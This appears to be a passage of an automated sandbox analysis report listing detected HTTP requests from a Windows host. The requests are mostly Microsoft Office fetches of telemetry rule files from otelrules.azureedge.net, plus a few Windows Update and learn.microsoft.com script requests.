          Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=TxBTEvPUg8ROmxr&MD=Lngvz3xX HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=TxBTEvPUg8ROmxr&MD=Lngvz3xX HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
